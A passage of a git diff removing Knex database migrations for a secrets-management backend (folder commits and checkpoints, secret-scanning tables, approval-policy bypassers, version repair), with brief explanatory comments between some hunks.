    await knex.schema.createTable(TableName.FolderTreeCheckpoint, (t) => {
      t.uuid("id").primary().defaultTo(knex.fn.uuid());
      t.uuid("folderCommitId").notNullable();
      t.foreign("folderCommitId").references("id").inTable(TableName.FolderCommit).onDelete("CASCADE");
      t.timestamps(true, true, true);

      t.index("folderCommitId");
    });
  }

  const hasFolderTreeCheckpointResourcesTable = await knex.schema.hasTable(TableName.FolderTreeCheckpointResources);
  if (!hasFolderTreeCheckpointResourcesTable) {
    await knex.schema.createTable(TableName.FolderTreeCheckpointResources, (t) => {
      t.uuid("id").primary().defaultTo(knex.fn.uuid());
      t.uuid("folderTreeCheckpointId").notNullable();
      t.foreign("folderTreeCheckpointId").references("id").inTable(TableName.FolderTreeCheckpoint).onDelete("CASCADE");
      t.uuid("folderId").notNullable();
      t.uuid("folderCommitId").notNullable();
      t.foreign("folderCommitId").references("id").inTable(TableName.FolderCommit).onDelete("CASCADE");
      t.timestamps(true, true, true);

      t.index("folderTreeCheckpointId");
      t.index("folderId");
      t.index("folderCommitId");
    });
  }

  if (!hasFolderCommitTable) {
    await createOnUpdateTrigger(knex, TableName.FolderCommit);
  }

  if (!hasFolderCommitChangesTable) {
    await createOnUpdateTrigger(knex, TableName.FolderCommitChanges);
  }

  if (!hasFolderCheckpointTable) {
    await createOnUpdateTrigger(knex, TableName.FolderCheckpoint);
  }

  if (!hasFolderCheckpointResourcesTable) {
    await createOnUpdateTrigger(knex, TableName.FolderCheckpointResources);
  }

  if (!hasFolderTreeCheckpointTable) {
    await createOnUpdateTrigger(knex, TableName.FolderTreeCheckpoint);
  }

  if (!hasFolderTreeCheckpointResourcesTable) {
    await createOnUpdateTrigger(knex, TableName.FolderTreeCheckpointResources);
  }
}

export async function down(knex: Knex): Promise<void> {
  const hasFolderCheckpointResourcesTable = await knex.schema.hasTable(TableName.FolderCheckpointResources);
  const hasFolderTreeCheckpointResourcesTable = await knex.schema.hasTable(TableName.FolderTreeCheckpointResources);
  const hasFolderCommitTable = await knex.schema.hasTable(TableName.FolderCommit);
  const hasFolderCommitChangesTable = await knex.schema.hasTable(TableName.FolderCommitChanges);
  const hasFolderTreeCheckpointTable = await knex.schema.hasTable(TableName.FolderTreeCheckpoint);
  const hasFolderCheckpointTable = await knex.schema.hasTable(TableName.FolderCheckpoint);

  if (hasFolderTreeCheckpointResourcesTable) {
    await dropOnUpdateTrigger(knex, TableName.FolderTreeCheckpointResources);
    await knex.schema.dropTableIfExists(TableName.FolderTreeCheckpointResources);
  }

  if (hasFolderCheckpointResourcesTable) {
    await dropOnUpdateTrigger(knex, TableName.FolderCheckpointResources);
    await knex.schema.dropTableIfExists(TableName.FolderCheckpointResources);
  }

  if (hasFolderTreeCheckpointTable) {
    await dropOnUpdateTrigger(knex, TableName.FolderTreeCheckpoint);
    await knex.schema.dropTableIfExists(TableName.FolderTreeCheckpoint);
  }

  if (hasFolderCheckpointTable) {
    await dropOnUpdateTrigger(knex, TableName.FolderCheckpoint);
    await knex.schema.dropTableIfExists(TableName.FolderCheckpoint);
  }

  if (hasFolderCommitChangesTable) {
    await dropOnUpdateTrigger(knex, TableName.FolderCommitChanges);
    await knex.schema.dropTableIfExists(TableName.FolderCommitChanges);
  }

  if (hasFolderCommitTable) {
    await dropOnUpdateTrigger(knex, TableName.FolderCommit);
    await knex.schema.dropTableIfExists(TableName.FolderCommit);
  }
}
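
The deleted migration above leans on one idempotency idiom throughout: check `hasTable` first, create only when absent, and guard the trigger creation with the same flag so a partial re-run cannot fail. Stripped to its skeleton (`createOnUpdateTrigger` is the repo helper imported in the migration; the table name here is illustrative):

export async function up(knex: Knex): Promise<void> {
  const hasTable = await knex.schema.hasTable("example_table");
  if (!hasTable) {
    await knex.schema.createTable("example_table", (t) => {
      t.uuid("id").primary().defaultTo(knex.fn.uuid());
      t.timestamps(true, true, true); // camelCase createdAt/updatedAt with defaults
    });
  }
  if (!hasTable) {
    // guarded by the same flag: the trigger only accompanies a freshly created table
    await createOnUpdateTrigger(knex, "example_table");
  }
}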

@ -4,7 +4,6 @@ import { inMemoryKeyStore } from "@app/keystore/memory";
import { selectAllTableCols } from "@app/lib/knex";
import { initLogger } from "@app/lib/logger";
import { KmsDataKey } from "@app/services/kms/kms-types";
import { superAdminDALFactory } from "@app/services/super-admin/super-admin-dal";

import { TableName } from "../schemas";
import { getMigrationEnvConfig } from "./utils/env-config";

@ -40,8 +39,7 @@ export async function up(knex: Knex): Promise<void> {
  );

  initLogger();
  const superAdminDAL = superAdminDALFactory(knex);
  const envConfig = await getMigrationEnvConfig(superAdminDAL);
  const envConfig = getMigrationEnvConfig();
  const keyStore = inMemoryKeyStore();
  const { kmsService } = await getMigrationEncryptionServices({ envConfig, keyStore, db: knex });

@ -1,107 +0,0 @@
import { Knex } from "knex";

import { TableName } from "@app/db/schemas";
import { createOnUpdateTrigger, dropOnUpdateTrigger } from "@app/db/utils";
import {
  SecretScanningFindingStatus,
  SecretScanningScanStatus
} from "@app/ee/services/secret-scanning-v2/secret-scanning-v2-enums";

export async function up(knex: Knex): Promise<void> {
  if (!(await knex.schema.hasTable(TableName.SecretScanningDataSource))) {
    await knex.schema.createTable(TableName.SecretScanningDataSource, (t) => {
      t.uuid("id", { primaryKey: true }).defaultTo(knex.fn.uuid());
      t.string("externalId").index(); // if we need a unique way of identifying this data source from an external resource
      t.string("name", 48).notNullable();
      t.string("description");
      t.string("type").notNullable();
      t.jsonb("config").notNullable();
      t.binary("encryptedCredentials"); // webhook credentials, etc.
      t.uuid("connectionId");
      t.boolean("isAutoScanEnabled").defaultTo(true);
      t.foreign("connectionId").references("id").inTable(TableName.AppConnection);
      t.string("projectId").notNullable();
      t.foreign("projectId").references("id").inTable(TableName.Project).onDelete("CASCADE");
      t.timestamps(true, true, true);
      t.boolean("isDisconnected").notNullable().defaultTo(false);
      t.unique(["projectId", "name"]);
    });
    await createOnUpdateTrigger(knex, TableName.SecretScanningDataSource);
  }

  if (!(await knex.schema.hasTable(TableName.SecretScanningResource))) {
    await knex.schema.createTable(TableName.SecretScanningResource, (t) => {
      t.uuid("id", { primaryKey: true }).defaultTo(knex.fn.uuid());
      t.string("externalId").notNullable();
      t.string("name").notNullable();
      t.string("type").notNullable();
      t.uuid("dataSourceId").notNullable();
      t.foreign("dataSourceId").references("id").inTable(TableName.SecretScanningDataSource).onDelete("CASCADE");
      t.timestamps(true, true, true);
      t.unique(["dataSourceId", "externalId"]);
    });
    await createOnUpdateTrigger(knex, TableName.SecretScanningResource);
  }

  if (!(await knex.schema.hasTable(TableName.SecretScanningScan))) {
    await knex.schema.createTable(TableName.SecretScanningScan, (t) => {
      t.uuid("id", { primaryKey: true }).defaultTo(knex.fn.uuid());
      t.string("status").notNullable().defaultTo(SecretScanningScanStatus.Queued);
      t.string("statusMessage", 1024);
      t.string("type").notNullable();
      t.uuid("resourceId").notNullable();
      t.foreign("resourceId").references("id").inTable(TableName.SecretScanningResource).onDelete("CASCADE");
      t.timestamp("createdAt").defaultTo(knex.fn.now());
    });
  }

  if (!(await knex.schema.hasTable(TableName.SecretScanningFinding))) {
    await knex.schema.createTable(TableName.SecretScanningFinding, (t) => {
      t.uuid("id", { primaryKey: true }).defaultTo(knex.fn.uuid());
      t.string("dataSourceName").notNullable();
      t.string("dataSourceType").notNullable();
      t.string("resourceName").notNullable();
      t.string("resourceType").notNullable();
      t.string("rule").notNullable();
      t.string("severity").notNullable();
      t.string("status").notNullable().defaultTo(SecretScanningFindingStatus.Unresolved);
      t.string("remarks");
      t.string("fingerprint").notNullable();
      t.jsonb("details").notNullable();
      t.string("projectId").notNullable();
      t.foreign("projectId").references("id").inTable(TableName.Project).onDelete("CASCADE");
      t.uuid("scanId");
      t.foreign("scanId").references("id").inTable(TableName.SecretScanningScan).onDelete("SET NULL");
      t.timestamps(true, true, true);
      t.unique(["projectId", "fingerprint"]);
    });
    await createOnUpdateTrigger(knex, TableName.SecretScanningFinding);
  }

  if (!(await knex.schema.hasTable(TableName.SecretScanningConfig))) {
    await knex.schema.createTable(TableName.SecretScanningConfig, (t) => {
      t.uuid("id", { primaryKey: true }).defaultTo(knex.fn.uuid());
      t.string("projectId").notNullable().unique();
      t.foreign("projectId").references("id").inTable(TableName.Project).onDelete("CASCADE");
      t.string("content", 5000);
      t.timestamps(true, true, true);
    });
    await createOnUpdateTrigger(knex, TableName.SecretScanningConfig);
  }
}

export async function down(knex: Knex): Promise<void> {
  await knex.schema.dropTableIfExists(TableName.SecretScanningFinding);

  await dropOnUpdateTrigger(knex, TableName.SecretScanningFinding);
  await knex.schema.dropTableIfExists(TableName.SecretScanningScan);

  await knex.schema.dropTableIfExists(TableName.SecretScanningResource);
  await dropOnUpdateTrigger(knex, TableName.SecretScanningResource);

  await knex.schema.dropTableIfExists(TableName.SecretScanningDataSource);
  await dropOnUpdateTrigger(knex, TableName.SecretScanningDataSource);

  await knex.schema.dropTableIfExists(TableName.SecretScanningConfig);
  await dropOnUpdateTrigger(knex, TableName.SecretScanningConfig);
}
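
One detail worth noting in the deleted migration above: `down` drops tables in reverse dependency order (findings before scans, scans before resources, resources before data sources) so no foreign key is left dangling. Reduced to its core (table names illustrative):

export async function down(knex: Knex): Promise<void> {
  // child tables first, parents last — dropping a still-referenced table would fail
  await knex.schema.dropTableIfExists("finding");     // FK -> scan (SET NULL)
  await knex.schema.dropTableIfExists("scan");        // FK -> resource (CASCADE)
  await knex.schema.dropTableIfExists("resource");    // FK -> data_source (CASCADE)
  await knex.schema.dropTableIfExists("data_source");
}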

@ -1,48 +0,0 @@
import { Knex } from "knex";

import { TableName } from "../schemas";
import { createOnUpdateTrigger, dropOnUpdateTrigger } from "../utils";

export async function up(knex: Knex): Promise<void> {
  if (!(await knex.schema.hasTable(TableName.AccessApprovalPolicyBypasser))) {
    await knex.schema.createTable(TableName.AccessApprovalPolicyBypasser, (t) => {
      t.uuid("id", { primaryKey: true }).defaultTo(knex.fn.uuid());

      t.uuid("bypasserGroupId").nullable();
      t.foreign("bypasserGroupId").references("id").inTable(TableName.Groups).onDelete("CASCADE");

      t.uuid("bypasserUserId").nullable();
      t.foreign("bypasserUserId").references("id").inTable(TableName.Users).onDelete("CASCADE");

      t.uuid("policyId").notNullable();
      t.foreign("policyId").references("id").inTable(TableName.AccessApprovalPolicy).onDelete("CASCADE");
      t.timestamps(true, true, true);
    });
    await createOnUpdateTrigger(knex, TableName.AccessApprovalPolicyBypasser);
  }

  if (!(await knex.schema.hasTable(TableName.SecretApprovalPolicyBypasser))) {
    await knex.schema.createTable(TableName.SecretApprovalPolicyBypasser, (t) => {
      t.uuid("id", { primaryKey: true }).defaultTo(knex.fn.uuid());

      t.uuid("bypasserGroupId").nullable();
      t.foreign("bypasserGroupId").references("id").inTable(TableName.Groups).onDelete("CASCADE");

      t.uuid("bypasserUserId").nullable();
      t.foreign("bypasserUserId").references("id").inTable(TableName.Users).onDelete("CASCADE");

      t.uuid("policyId").notNullable();
      t.foreign("policyId").references("id").inTable(TableName.SecretApprovalPolicy).onDelete("CASCADE");
      t.timestamps(true, true, true);
    });
    await createOnUpdateTrigger(knex, TableName.SecretApprovalPolicyBypasser);
  }
}

export async function down(knex: Knex): Promise<void> {
  await knex.schema.dropTableIfExists(TableName.SecretApprovalPolicyBypasser);
  await knex.schema.dropTableIfExists(TableName.AccessApprovalPolicyBypasser);

  await dropOnUpdateTrigger(knex, TableName.SecretApprovalPolicyBypasser);
  await dropOnUpdateTrigger(knex, TableName.AccessApprovalPolicyBypasser);
}

@ -1,21 +0,0 @@
import { Knex } from "knex";

import { TableName } from "../schemas";

export async function up(knex: Knex): Promise<void> {
  const hasColumn = await knex.schema.hasColumn(TableName.DynamicSecret, "usernameTemplate");
  if (!hasColumn) {
    await knex.schema.alterTable(TableName.DynamicSecret, (t) => {
      t.string("usernameTemplate").nullable();
    });
  }
}

export async function down(knex: Knex): Promise<void> {
  const hasColumn = await knex.schema.hasColumn(TableName.DynamicSecret, "usernameTemplate");
  if (hasColumn) {
    await knex.schema.alterTable(TableName.DynamicSecret, (t) => {
      t.dropColumn("usernameTemplate");
    });
  }
}

@ -1,19 +0,0 @@
import { Knex } from "knex";

import { TableName } from "../schemas";

export async function up(knex: Knex): Promise<void> {
  if (!(await knex.schema.hasColumn(TableName.SecretFolderVersion, "description"))) {
    await knex.schema.alterTable(TableName.SecretFolderVersion, (t) => {
      t.string("description").nullable();
    });
  }
}

export async function down(knex: Knex): Promise<void> {
  if (await knex.schema.hasColumn(TableName.SecretFolderVersion, "description")) {
    await knex.schema.alterTable(TableName.SecretFolderVersion, (t) => {
      t.dropColumn("description");
    });
  }
}

@ -1,24 +0,0 @@
import slugify from "@sindresorhus/slugify";
import { Knex } from "knex";

import { alphaNumericNanoId } from "@app/lib/nanoid";

import { TableName } from "../schemas";

export async function up(knex: Knex): Promise<void> {
  const hasNameCol = await knex.schema.hasColumn(TableName.CertificateTemplate, "name");
  if (hasNameCol) {
    const templates = await knex(TableName.CertificateTemplate).select("id", "name");
    await Promise.all(
      templates.map((el) => {
        const slugifiedName = el.name
          ? slugify(`${el.name.slice(0, 16)}-${alphaNumericNanoId(8)}`)
          : slugify(alphaNumericNanoId(12));

        return knex(TableName.CertificateTemplate).where({ id: el.id }).update({ name: slugifiedName });
      })
    );
  }
}

export async function down(): Promise<void> {}
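
The slug backfill above compresses into one idea: truncate the human name, then append a random suffix so names stay collision-resistant even after truncation. An illustrative trace (`alphaNumericNanoId` is an app helper; the sample output assumes its usual random-alphanumeric behavior):

// "Internal Web Server Cert" --slice(0, 16)--> "Internal Web Ser"
// + "-" + alphaNumericNanoId(8)              -> "Internal Web Ser-x7K2m9Qa"
// slugify(...)                               -> "internal-web-ser-x7k2m9qa"
const slugifiedName = el.name
  ? slugify(`${el.name.slice(0, 16)}-${alphaNumericNanoId(8)}`)
  : slugify(alphaNumericNanoId(12));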

@ -1,63 +0,0 @@
import { Knex } from "knex";

import { ApprovalStatus } from "@app/ee/services/secret-approval-request/secret-approval-request-types";

import { TableName } from "../schemas";

export async function up(knex: Knex): Promise<void> {
  const hasPrivilegeDeletedAtColumn = await knex.schema.hasColumn(
    TableName.AccessApprovalRequest,
    "privilegeDeletedAt"
  );
  const hasStatusColumn = await knex.schema.hasColumn(TableName.AccessApprovalRequest, "status");

  if (!hasPrivilegeDeletedAtColumn) {
    await knex.schema.alterTable(TableName.AccessApprovalRequest, (t) => {
      t.timestamp("privilegeDeletedAt").nullable();
    });
  }

  if (!hasStatusColumn) {
    await knex.schema.alterTable(TableName.AccessApprovalRequest, (t) => {
      t.string("status").defaultTo(ApprovalStatus.PENDING).notNullable();
    });

    // Update existing rows based on business logic
    // If privilegeId is not null, set status to "approved"
    await knex(TableName.AccessApprovalRequest).whereNotNull("privilegeId").update({ status: ApprovalStatus.APPROVED });

    // If privilegeId is null and there's a rejected reviewer, set to "rejected"
    const rejectedRequestIds = await knex(TableName.AccessApprovalRequestReviewer)
      .select("requestId")
      .where("status", "rejected")
      .distinct()
      .pluck("requestId");

    if (rejectedRequestIds.length > 0) {
      await knex(TableName.AccessApprovalRequest)
        .whereNull("privilegeId")
        .whereIn("id", rejectedRequestIds)
        .update({ status: ApprovalStatus.REJECTED });
    }
  }
}

export async function down(knex: Knex): Promise<void> {
  const hasPrivilegeDeletedAtColumn = await knex.schema.hasColumn(
    TableName.AccessApprovalRequest,
    "privilegeDeletedAt"
  );
  const hasStatusColumn = await knex.schema.hasColumn(TableName.AccessApprovalRequest, "status");

  if (hasPrivilegeDeletedAtColumn) {
    await knex.schema.alterTable(TableName.AccessApprovalRequest, (t) => {
      t.dropColumn("privilegeDeletedAt");
    });
  }

  if (hasStatusColumn) {
    await knex.schema.alterTable(TableName.AccessApprovalRequest, (t) => {
      t.dropColumn("status");
    });
  }
}
@ -1,139 +0,0 @@
|
||||
/* eslint-disable no-await-in-loop */
|
||||
import { Knex } from "knex";
|
||||
|
||||
import { chunkArray } from "@app/lib/fn";
|
||||
import { selectAllTableCols } from "@app/lib/knex";
|
||||
import { logger } from "@app/lib/logger";
|
||||
|
||||
import { SecretType, TableName } from "../schemas";
|
||||
|
||||
export async function up(knex: Knex): Promise<void> {
|
||||
logger.info("Starting secret version fix migration");
|
||||
|
||||
// Get all shared secret IDs first to optimize versions query
|
||||
const secretIds = await knex(TableName.SecretV2)
|
||||
.where("type", SecretType.Shared)
|
||||
.select("id")
|
||||
.then((rows) => rows.map((row) => row.id));
|
||||
|
||||
logger.info(`Found ${secretIds.length} shared secrets to process`);
|
||||
|
||||
if (secretIds.length === 0) {
|
||||
logger.info("No shared secrets found");
|
||||
return;
|
||||
}
|
||||
|
||||
const secretIdChunks = chunkArray(secretIds, 5000);
|
||||
|
||||
for (let chunkIndex = 0; chunkIndex < secretIdChunks.length; chunkIndex += 1) {
|
||||
const currentSecretIds = secretIdChunks[chunkIndex];
|
||||
    logger.info(`Processing chunk ${chunkIndex + 1} of ${secretIdChunks.length}`);

    // Get secrets and versions for current chunk
    const [sharedSecrets, allVersions] = await Promise.all([
      knex(TableName.SecretV2).whereIn("id", currentSecretIds).select(selectAllTableCols(TableName.SecretV2)),
      knex(TableName.SecretVersionV2).whereIn("secretId", currentSecretIds).select("secretId", "version")
    ]);

    const versionsBySecretId = new Map<string, number[]>();

    allVersions.forEach((v) => {
      const versions = versionsBySecretId.get(v.secretId);
      if (versions) {
        versions.push(v.version);
      } else {
        versionsBySecretId.set(v.secretId, [v.version]);
      }
    });

    const versionsToAdd = [];
    const secretsToUpdate = [];

    // Process each shared secret
    for (const secret of sharedSecrets) {
      const existingVersions = versionsBySecretId.get(secret.id) || [];

      if (existingVersions.length === 0) {
        // No versions exist - add current version
        versionsToAdd.push({
          secretId: secret.id,
          version: secret.version,
          key: secret.key,
          encryptedValue: secret.encryptedValue,
          encryptedComment: secret.encryptedComment,
          reminderNote: secret.reminderNote,
          reminderRepeatDays: secret.reminderRepeatDays,
          skipMultilineEncoding: secret.skipMultilineEncoding,
          metadata: secret.metadata,
          folderId: secret.folderId,
          actorType: "platform"
        });
      } else {
        const latestVersion = Math.max(...existingVersions);

        if (latestVersion !== secret.version) {
          // Latest version doesn't match - create new version and update secret
          const nextVersion = latestVersion + 1;

          versionsToAdd.push({
            secretId: secret.id,
            version: nextVersion,
            key: secret.key,
            encryptedValue: secret.encryptedValue,
            encryptedComment: secret.encryptedComment,
            reminderNote: secret.reminderNote,
            reminderRepeatDays: secret.reminderRepeatDays,
            skipMultilineEncoding: secret.skipMultilineEncoding,
            metadata: secret.metadata,
            folderId: secret.folderId,
            actorType: "platform"
          });

          secretsToUpdate.push({
            id: secret.id,
            newVersion: nextVersion
          });
        }
      }
    }

    logger.info(
      `Chunk ${chunkIndex + 1}: Adding ${versionsToAdd.length} versions, updating ${secretsToUpdate.length} secrets`
    );

    // Batch insert new versions
    if (versionsToAdd.length > 0) {
      const insertBatches = chunkArray(versionsToAdd, 9000);
      for (let i = 0; i < insertBatches.length; i += 1) {
        await knex.batchInsert(TableName.SecretVersionV2, insertBatches[i]);
      }
    }

    if (secretsToUpdate.length > 0) {
      const updateBatches = chunkArray(secretsToUpdate, 1000);

      for (const updateBatch of updateBatches) {
        const ids = updateBatch.map((u) => u.id);
        const versionCases = updateBatch.map((u) => `WHEN '${u.id}' THEN ${u.newVersion}`).join(" ");

        await knex.raw(
          `
          UPDATE ${TableName.SecretV2}
          SET version = CASE id ${versionCases} END,
              "updatedAt" = NOW()
          WHERE id IN (${ids.map(() => "?").join(",")})
        `,
          ids
        );
      }
    }
  }

  logger.info("Secret version fix migration completed");
}

export async function down(): Promise<void> {
  logger.info("Rollback not implemented for secret version fix migration");
  // Note: Rolling back this migration would be complex and potentially destructive
  // as it would require tracking which version entries were added
}
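The CASE-based batch update above interpolates the ids and versions directly into the SQL string and only binds the IN-list values. A hedged sketch of a fully parameterized variant follows; it is illustrative only and not the migration's actual code (interpolation is safe here since the ids are database-generated UUIDs).

// Hedged sketch: the same CASE-based batch update with every value bound as a
// parameter rather than interpolated. `updateBatch` has the shape built above.
import { Knex } from "knex";

import { TableName } from "../schemas";

const updateVersionsParameterized = async (knex: Knex, updateBatch: { id: string; newVersion: number }[]) => {
  const cases = updateBatch.map(() => "WHEN ? THEN ?").join(" ");
  const caseBindings = updateBatch.flatMap((u) => [u.id, u.newVersion]);
  const ids = updateBatch.map((u) => u.id);
  await knex.raw(
    `UPDATE ${TableName.SecretV2}
     SET version = CASE id ${cases} END,
         "updatedAt" = NOW()
     WHERE id IN (${ids.map(() => "?").join(",")})`,
    [...caseBindings, ...ids]
  );
};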
@ -1,345 +0,0 @@
import { Knex } from "knex";

import { chunkArray } from "@app/lib/fn";
import { selectAllTableCols } from "@app/lib/knex";
import { logger } from "@app/lib/logger";
import { ActorType } from "@app/services/auth/auth-type";
import { ChangeType } from "@app/services/folder-commit/folder-commit-service";

import {
  ProjectType,
  SecretType,
  TableName,
  TFolderCheckpoints,
  TFolderCommits,
  TFolderTreeCheckpoints,
  TSecretFolders
} from "../schemas";

const sortFoldersByHierarchy = (folders: TSecretFolders[]) => {
  // Create a map for quick lookup of children by parent ID
  const childrenMap = new Map<string, TSecretFolders[]>();

  // Set of all folder IDs
  const allFolderIds = new Set<string>();

  // Build the set of all folder IDs
  folders.forEach((folder) => {
    if (folder.id) {
      allFolderIds.add(folder.id);
    }
  });

  // Group folders by their parentId
  folders.forEach((folder) => {
    if (folder.parentId) {
      const children = childrenMap.get(folder.parentId) || [];
      children.push(folder);
      childrenMap.set(folder.parentId, children);
    }
  });

  // Find root folders - those with no parentId or with a parentId that doesn't exist
  const rootFolders = folders.filter((folder) => !folder.parentId || !allFolderIds.has(folder.parentId));

  // Process each level of the hierarchy
  const result = [];
  let currentLevel = rootFolders;

  while (currentLevel.length > 0) {
    result.push(...currentLevel);

    const nextLevel = [];
    for (const folder of currentLevel) {
      if (folder.id) {
        const children = childrenMap.get(folder.id) || [];
        nextLevel.push(...children);
      }
    }

    currentLevel = nextLevel;
  }

  return result.reverse();
};

const getSecretsByFolderIds = async (knex: Knex, folderIds: string[]): Promise<Record<string, string[]>> => {
  const secrets = await knex(TableName.SecretV2)
    .whereIn(`${TableName.SecretV2}.folderId`, folderIds)
    .where(`${TableName.SecretV2}.type`, SecretType.Shared)
    .join<TableName.SecretVersionV2>(TableName.SecretVersionV2, (queryBuilder) => {
      void queryBuilder
        .on(`${TableName.SecretVersionV2}.secretId`, `${TableName.SecretV2}.id`)
        .andOn(`${TableName.SecretVersionV2}.version`, `${TableName.SecretV2}.version`);
    })
    .select(selectAllTableCols(TableName.SecretV2))
    .select(knex.ref("id").withSchema(TableName.SecretVersionV2).as("secretVersionId"));

  const secretsMap: Record<string, string[]> = {};

  secrets.forEach((secret) => {
    if (!secretsMap[secret.folderId]) {
      secretsMap[secret.folderId] = [];
    }
    secretsMap[secret.folderId].push(secret.secretVersionId);
  });

  return secretsMap;
};

const getFoldersByParentIds = async (knex: Knex, parentIds: string[]): Promise<Record<string, string[]>> => {
  const folders = await knex(TableName.SecretFolder)
    .whereIn(`${TableName.SecretFolder}.parentId`, parentIds)
    .where(`${TableName.SecretFolder}.isReserved`, false)
    .join<TableName.SecretFolderVersion>(TableName.SecretFolderVersion, (queryBuilder) => {
      void queryBuilder
        .on(`${TableName.SecretFolderVersion}.folderId`, `${TableName.SecretFolder}.id`)
        .andOn(`${TableName.SecretFolderVersion}.version`, `${TableName.SecretFolder}.version`);
    })
    .select(selectAllTableCols(TableName.SecretFolder))
    .select(knex.ref("id").withSchema(TableName.SecretFolderVersion).as("folderVersionId"));

  const foldersMap: Record<string, string[]> = {};

  folders.forEach((folder) => {
    if (!folder.parentId) {
      return;
    }
    if (!foldersMap[folder.parentId]) {
      foldersMap[folder.parentId] = [];
    }
    foldersMap[folder.parentId].push(folder.folderVersionId);
  });

  return foldersMap;
};

export async function up(knex: Knex): Promise<void> {
  logger.info("Initializing folder commits");
  const hasFolderCommitTable = await knex.schema.hasTable(TableName.FolderCommit);
  if (hasFolderCommitTable) {
    // Get Projects to Initialize
    const projects = await knex(TableName.Project)
      .where(`${TableName.Project}.version`, 3)
      .where(`${TableName.Project}.type`, ProjectType.SecretManager)
      .select(selectAllTableCols(TableName.Project));
    logger.info(`Found ${projects.length} projects to initialize`);

    // Process Projects in batches of 100
    const batches = chunkArray(projects, 100);
    let i = 0;
    for (const batch of batches) {
      i += 1;
      logger.info(`Processing project batch ${i} of ${batches.length}`);
      let foldersCommitsList = [];

      const rootFoldersMap: Record<string, string> = {};
      const envRootFoldersMap: Record<string, string> = {};

      // Get All Folders for the Project
      // eslint-disable-next-line no-await-in-loop
      const folders = await knex(TableName.SecretFolder)
        .join(TableName.Environment, `${TableName.SecretFolder}.envId`, `${TableName.Environment}.id`)
        .whereIn(
          `${TableName.Environment}.projectId`,
          batch.map((project) => project.id)
        )
        .where(`${TableName.SecretFolder}.isReserved`, false)
        .select(selectAllTableCols(TableName.SecretFolder));
      logger.info(`Found ${folders.length} folders to initialize in project batch ${i} of ${batches.length}`);

      // Sort Folders by Hierarchy (parents before nested folders)
      const sortedFolders = sortFoldersByHierarchy(folders);

      // eslint-disable-next-line no-await-in-loop
      const folderSecretsMap = await getSecretsByFolderIds(
        knex,
        sortedFolders.map((folder) => folder.id)
      );
      // eslint-disable-next-line no-await-in-loop
      const folderFoldersMap = await getFoldersByParentIds(
        knex,
        sortedFolders.map((folder) => folder.id)
      );

      // Get folder commit changes
      for (const folder of sortedFolders) {
        const subFolderVersionIds = folderFoldersMap[folder.id];
        const secretVersionIds = folderSecretsMap[folder.id];
        const changes = [];
        if (subFolderVersionIds) {
          changes.push(
            ...subFolderVersionIds.map((folderVersionId) => ({
              folderId: folder.id,
              changeType: ChangeType.ADD,
              secretVersionId: undefined,
              folderVersionId,
              isUpdate: false
            }))
          );
        }
        if (secretVersionIds) {
          changes.push(
            ...secretVersionIds.map((secretVersionId) => ({
              folderId: folder.id,
              changeType: ChangeType.ADD,
              secretVersionId,
              folderVersionId: undefined,
              isUpdate: false
            }))
          );
        }
        if (changes.length > 0) {
          const folderCommit = {
            commit: {
              actorMetadata: {},
              actorType: ActorType.PLATFORM,
              message: "Initialized folder",
              folderId: folder.id,
              envId: folder.envId
            },
            changes
          };
          foldersCommitsList.push(folderCommit);
          if (!folder.parentId) {
            rootFoldersMap[folder.id] = folder.envId;
            envRootFoldersMap[folder.envId] = folder.id;
          }
        }
      }
      logger.info(`Retrieved folder changes for project batch ${i} of ${batches.length}`);

      const filteredBrokenProjectFolders: string[] = [];

      foldersCommitsList = foldersCommitsList.filter((folderCommit) => {
        if (!envRootFoldersMap[folderCommit.commit.envId]) {
          filteredBrokenProjectFolders.push(folderCommit.commit.folderId);
          return false;
        }
        return true;
      });

      logger.info(
        `Filtered ${filteredBrokenProjectFolders.length} broken project folders: ${JSON.stringify(filteredBrokenProjectFolders)}`
      );

      // Insert New Commits in batches of 9000
      const newCommits = foldersCommitsList.map((folderCommit) => folderCommit.commit);
      const commitBatches = chunkArray(newCommits, 9000);

      let j = 0;
      for (const commitBatch of commitBatches) {
        j += 1;
        logger.info(`Inserting folder commits - batch ${j} of ${commitBatches.length}`);
        // Create folder commit
        // eslint-disable-next-line no-await-in-loop
        const newCommitsInserted = (await knex
          .batchInsert(TableName.FolderCommit, commitBatch)
          .returning("*")) as TFolderCommits[];

        logger.info(`Finished inserting folder commits - batch ${j} of ${commitBatches.length}`);

        const newCommitsMap: Record<string, string> = {};
        const newCommitsMapInverted: Record<string, string> = {};
        const newCheckpointsMap: Record<string, string> = {};
        newCommitsInserted.forEach((commit) => {
          newCommitsMap[commit.folderId] = commit.id;
          newCommitsMapInverted[commit.id] = commit.folderId;
        });

        // Create folder checkpoints
        // eslint-disable-next-line no-await-in-loop
        const newCheckpoints = (await knex
          .batchInsert(
            TableName.FolderCheckpoint,
            Object.values(newCommitsMap).map((commitId) => ({
              folderCommitId: commitId
            }))
          )
          .returning("*")) as TFolderCheckpoints[];

        logger.info(`Finished inserting folder checkpoints - batch ${j} of ${commitBatches.length}`);

        newCheckpoints.forEach((checkpoint) => {
          newCheckpointsMap[newCommitsMapInverted[checkpoint.folderCommitId]] = checkpoint.id;
        });

        // Create folder commit changes
        // eslint-disable-next-line no-await-in-loop
        await knex.batchInsert(
          TableName.FolderCommitChanges,
          foldersCommitsList
            .map((folderCommit) => folderCommit.changes)
            .flat()
            .map((change) => ({
              folderCommitId: newCommitsMap[change.folderId],
              changeType: change.changeType,
              secretVersionId: change.secretVersionId,
              folderVersionId: change.folderVersionId,
              isUpdate: false
            }))
        );

        logger.info(`Finished inserting folder commit changes - batch ${j} of ${commitBatches.length}`);

        // Create folder checkpoint resources
        // eslint-disable-next-line no-await-in-loop
        await knex.batchInsert(
          TableName.FolderCheckpointResources,
          foldersCommitsList
            .map((folderCommit) => folderCommit.changes)
            .flat()
            .map((change) => ({
              folderCheckpointId: newCheckpointsMap[change.folderId],
              folderVersionId: change.folderVersionId,
              secretVersionId: change.secretVersionId
            }))
        );

        logger.info(`Finished inserting folder checkpoint resources - batch ${j} of ${commitBatches.length}`);

        // Create Folder Tree Checkpoint
        // eslint-disable-next-line no-await-in-loop
        const newTreeCheckpoints = (await knex
          .batchInsert(
            TableName.FolderTreeCheckpoint,
            Object.keys(rootFoldersMap).map((folderId) => ({
              folderCommitId: newCommitsMap[folderId]
            }))
          )
          .returning("*")) as TFolderTreeCheckpoints[];

        logger.info(`Finished inserting folder tree checkpoints - batch ${j} of ${commitBatches.length}`);

        const newTreeCheckpointsMap: Record<string, string> = {};
        newTreeCheckpoints.forEach((checkpoint) => {
          newTreeCheckpointsMap[rootFoldersMap[newCommitsMapInverted[checkpoint.folderCommitId]]] = checkpoint.id;
        });

